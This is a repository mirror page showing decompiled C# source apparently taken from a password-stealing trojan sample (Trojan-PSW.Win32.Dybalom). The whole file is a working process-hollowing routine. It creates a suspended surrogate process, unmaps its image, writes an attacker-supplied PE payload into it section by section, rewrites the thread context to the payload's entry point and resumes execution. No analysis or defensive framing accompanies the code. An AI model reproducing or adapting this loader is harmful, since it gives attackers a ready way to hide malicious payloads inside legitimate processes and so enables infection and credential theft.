mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-17 07:45:28 +00:00
f2ac1ece55
add
128 lines
4.6 KiB
C#
128 lines
4.6 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: IX
|
|
// Assembly: 46-dcrio, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: C9E84790-40DE-4FD0-B1D8-6D752394B661
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-PSW.Win32.Dybalom.gwl-2eda97c03c7d80a9fcab10c2aef6f5e99486b52f17a07b2b973ea35e95765270.exe
|
|
|
|
using System;
|
|
using System.Runtime.InteropServices;
|
|
using System.Text;
|
|
|
|
public class IX
|
|
{
|
|
[DllImport("kernel32")]
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
private static extern bool CreateProcess(
|
|
string appName,
|
|
StringBuilder commandLine,
|
|
IntPtr procAttr,
|
|
IntPtr thrAttr,
|
|
[MarshalAs(UnmanagedType.Bool)] bool inherit,
|
|
int creation,
|
|
IntPtr env,
|
|
string curDir,
|
|
byte[] sInfo,
|
|
IntPtr[] pInfo);
|
|
|
|
[DllImport("kernel32")]
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
private static extern bool GetThreadContext(IntPtr hThr, uint[] ctxt);
|
|
|
|
[DllImport("kernel32")]
|
|
private static extern bool SetThreadContext(IntPtr t, uint[] c);
|
|
|
|
[DllImport("ntdll")]
|
|
private static extern uint NtUnmapViewOfSection(IntPtr hProc, IntPtr baseAddr);
|
|
|
|
[DllImport("kernel32")]
|
|
[return: MarshalAs(UnmanagedType.Bool)]
|
|
private static extern bool ReadProcessMemory(
|
|
IntPtr hProc,
|
|
IntPtr baseAddr,
|
|
ref IntPtr bufr,
|
|
int bufrSize,
|
|
ref IntPtr numRead);
|
|
|
|
[DllImport("kernel32.dll")]
|
|
private static extern uint ResumeThread(IntPtr hThread);
|
|
|
|
[DllImport("kernel32")]
|
|
private static extern IntPtr VirtualAllocEx(
|
|
IntPtr hProc,
|
|
IntPtr addr,
|
|
IntPtr size,
|
|
int allocType,
|
|
int prot);
|
|
|
|
[DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)]
|
|
private static extern bool VirtualProtectEx(
|
|
IntPtr hProcess,
|
|
IntPtr lpAddress,
|
|
IntPtr dwSize,
|
|
uint flNewProtect,
|
|
ref uint lpflOldProtect);
|
|
|
|
[DllImport("kernel32.dll", SetLastError = true)]
|
|
private static extern bool WriteProcessMemory(
|
|
IntPtr hProcess,
|
|
IntPtr lpBaseAddress,
|
|
byte[] lpBuffer,
|
|
uint nSize,
|
|
out int lpNumberOfBytesWritten);
|
|
|
|
public static bool R(byte[] bytes, string surrogateProcess)
|
|
{
|
|
try
|
|
{
|
|
IntPtr zero1 = IntPtr.Zero;
|
|
IntPtr[] pInfo = new IntPtr[4];
|
|
byte[] sInfo = new byte[68];
|
|
int int32 = BitConverter.ToInt32(bytes, 60);
|
|
int int16 = (int) BitConverter.ToInt16(bytes, int32 + 6);
|
|
IntPtr nSize = new IntPtr(BitConverter.ToInt32(bytes, int32 + 84));
|
|
if (IX.CreateProcess((string) null, new StringBuilder(surrogateProcess), zero1, zero1, false, 4, zero1, (string) null, sInfo, pInfo))
|
|
{
|
|
uint[] numArray1 = new uint[179];
|
|
numArray1[0] = 65538U;
|
|
if (IX.GetThreadContext(pInfo[1], numArray1))
|
|
{
|
|
IntPtr baseAddr = new IntPtr((long) numArray1[41] + 8L);
|
|
IntPtr zero2 = IntPtr.Zero;
|
|
IntPtr bufrSize = new IntPtr(4);
|
|
IntPtr zero3 = IntPtr.Zero;
|
|
if (IX.ReadProcessMemory(pInfo[0], baseAddr, ref zero2, (int) bufrSize, ref zero3) && IX.NtUnmapViewOfSection(pInfo[0], zero2) == 0U)
|
|
{
|
|
IntPtr num1 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 52));
|
|
IntPtr num2 = new IntPtr(BitConverter.ToInt32(bytes, int32 + 80));
|
|
IntPtr lpBaseAddress = IX.VirtualAllocEx(pInfo[0], num1, num2, 12288, 64);
|
|
int lpNumberOfBytesWritten;
|
|
IX.WriteProcessMemory(pInfo[0], lpBaseAddress, bytes, (uint) (int) nSize, out lpNumberOfBytesWritten);
|
|
int num3 = int16 - 1;
|
|
for (int index = 0; index <= num3; ++index)
|
|
{
|
|
int[] dst = new int[10];
|
|
Buffer.BlockCopy((Array) bytes, int32 + 248 + index * 40, (Array) dst, 0, 40);
|
|
byte[] numArray2 = new byte[dst[4] - 1 + 1];
|
|
Buffer.BlockCopy((Array) bytes, dst[5], (Array) numArray2, Convert.ToInt32((string) null, 2), numArray2.Length);
|
|
num2 = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
|
|
num1 = new IntPtr(numArray2.Length);
|
|
IX.WriteProcessMemory(pInfo[0], num2, numArray2, (uint) (int) num1, out lpNumberOfBytesWritten);
|
|
}
|
|
num2 = new IntPtr((long) numArray1[41] + 8L);
|
|
num1 = new IntPtr(4);
|
|
IX.WriteProcessMemory(pInfo[0], num2, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint) (int) num1, out lpNumberOfBytesWritten);
|
|
numArray1[44] = (uint) (lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, int32 + 40));
|
|
IX.SetThreadContext(pInfo[1], numArray1);
|
|
}
|
|
}
|
|
int num = (int) IX.ResumeThread(pInfo[1]);
|
|
}
|
|
}
|
|
catch
|
|
{
|
|
return false;
|
|
}
|
|
return true;
|
|
}
|
|
}
|